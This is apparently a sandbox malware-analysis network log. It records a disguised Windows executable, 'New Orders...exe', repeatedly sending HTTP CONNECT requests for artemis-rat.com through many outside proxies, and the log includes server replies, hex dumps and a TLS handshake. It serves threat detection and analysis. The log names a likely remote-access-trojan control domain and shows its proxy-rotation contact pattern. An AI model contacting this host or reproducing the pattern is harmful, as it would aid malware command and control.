                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.866590977 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        59192.168.2.949968162.243.102.20797647672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.725867033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        60192.168.2.94996767.43.236.18171457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.726474047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.753861904 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        61192.168.2.949934211.222.252.18781937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.729155064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        62192.168.2.950021162.159.242.138807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.733767986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.895775080 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        63192.168.2.94991639.105.5.126807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.736756086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        64192.168.2.94993743.131.245.216156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.749404907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        65192.168.2.95014943.157.32.44437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.753546953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        66192.168.2.950043104.20.56.71807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.761915922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.916457891 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        67192.168.2.950046172.67.53.215807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.764631987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.918771982 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        68192.168.2.950012107.180.88.41248347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.770241022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.288639069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.929275036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.196363926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.773463964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.476636887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        69192.168.2.949905103.153.232.4180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.781083107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.059182882 CET19INHTTP/1.1 200 OK
                                                                                        Mar 11, 2024 16:17:44.250794888 CET208INHTTP/1.0 504 Gateway Timeout
                                                                                        Content-Length: 718
                                                                                        Content-Type: text/html
                                                                                        Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                                        Expires: Mon, 11 Mar 2024 15:15:20 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        70192.168.2.94997652.196.1.182807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.781090021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.047585011 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:40.048712015 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 57 01 cf 43 24 02 de 34 38 13 ec fe 06 b6 59 ac f8 89 93 3d 05 f7 04 08 b3 0d 90 2e 7f 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e WC$48Y=.*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:40.315112114 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 8d 71 74 c0 61 c4 71 ad c5 1c d4 de 16 f9 1b fe 14 ee 39 a7 e1 45 cf 43 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =9qtaq9ECDOWNGRD0000*H010Uartemis-rat.com0240311151251Z260311151251Z010Uartemis-rat.com0"0*H0c XY
                                                                                        Mar 11, 2024 16:16:40.318435907 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 4c 7a 4c 8f 1b f6 63 a5 ac 7f 9d ff 5a 77 14 2a d5 fe 74 d0 01 6e 82 44 b6 9f 32 bb 47 66 36 1a 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 2a ff a3 ac c9 ee da e0 44 3b 47 73 a6 cc 92 19 af d6 c4 06 53
                                                                                        Data Ascii: %! LzLcZw*tnD2Gf6(*D;GsS;=|k
                                                                                        Mar 11, 2024 16:16:40.583076954 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 95 fc 5a d0 97 45 bd d5 02 54 76 eb 91 72 c4 cf 8a 67 3b 05 b7 07 9d 40 b4 51 ab 66 9f 62 8f ca 98 92 ae 72 73 39 4f 33
                                                                                        Data Ascii: (ZETvrg;@Qfbrs9O3


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        71192.168.2.94997151.15.242.20288887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.800930023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.094022989 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.21.6
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.6</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        72192.168.2.949975195.154.172.16131287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.805596113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:39.186697960 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        73192.168.2.950077185.238.228.67807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.805608034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.959939957 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        74192.168.2.94996551.89.173.40551987672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.809334040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.476147890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        75192.168.2.9499438.142.132.204180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.822037935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        76192.168.2.95009523.227.38.198807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.825763941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.980207920 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        77192.168.2.95003867.43.228.251260877672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.826524019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.382419109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        78192.168.2.949989163.172.171.22163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.829251051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.460527897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.319987059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.070353031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.698571920 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
